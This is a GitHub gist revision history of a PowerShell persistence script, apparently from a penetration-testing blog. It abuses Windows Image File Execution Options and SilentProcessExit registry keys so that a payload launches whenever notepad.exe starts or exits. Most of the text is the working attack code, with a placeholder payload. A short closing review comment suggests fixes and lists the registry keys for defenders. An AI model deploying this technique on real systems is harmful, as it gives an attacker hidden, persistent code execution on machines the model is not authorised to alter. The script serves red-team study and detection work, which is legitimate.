netbiosX revised this gist
Jan 13, 2020 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,7 +3,8 @@ License: GPLv3 Author: @netbiosX #> # Image File Execution Options Injection Persistence Technique # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ function Persist-Debugger -
netbiosX revised this gist
Jan 7, 2020 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -26,7 +26,7 @@ function Persist-Debugger $GetIFEO = Get-Item -Path "$GetRegKey" $Payload = 'calc.exe' $GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload } @@ -57,7 +57,7 @@ function Persist-GlobalFlags $GetIFEO = Get-Item -Path "$GetRegKey" $GetIF = Get-Item -Path "$GetReg" $Payload = 'C:\Windows\System32\calc.exe' $GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD" -
netbiosX created this gist
Jan 1, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,67 @@ <# ImageFileExecutionOptions v1.0 License: GPLv3 Author: @netbiosX #> # Image File Execution Options Injection Persistence Technique function Persist-Debugger { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\Image File Execution Options\notepad.exe"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $Payload = 'pentestlab.exe' $GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload } } function Persist-GlobalFlags { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\SilentProcessExit"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry" -Name 'SilentProcessExit' New-Item -Path "$Registry\SilentProcessExit" -Name 'notepad.exe' New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe' $GetReg = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $GetIF = Get-Item -Path "$GetReg" $Payload = 'C:\temp\pentestlab.exe' $GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD" $GetIF | New-ItemProperty -Name GlobalFlag -Value 512 -PropertyType "DWORD" } }
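Review bot: Both Persist-Debugger and Persist-GlobalFlags call Push-Location and Set-Location on the HKLM: path but never Pop-Location, so each invocation leaves the calling session one entry deeper on the location stack and positioned inside the registry drive; nothing in either body relies on the current location (every later call passes an absolute path), so either drop those two lines or end each function with `Pop-Location`. The `<# ... #>` header should also state that both functions write under HKLM, which normally needs an elevated session, and list the exact keys and values they create (`Image File Execution Options\notepad.exe` with `Debugger`, `SilentProcessExit\notepad.exe` with `MonitorProcess` and `ReportingMode`, and `GlobalFlag` on the IFEO key) so that a lab user can revert the change and a defender knows which registry paths to watch in registry-write telemetry. In Persist-GlobalFlags the guard `if(Test-Path "$Registry\SilentProcessExit")` checks only the parent key, so the 'Key Already Exists' message is printed even when the notepad.exe subkey does not exist; the check and the message should refer to the same key.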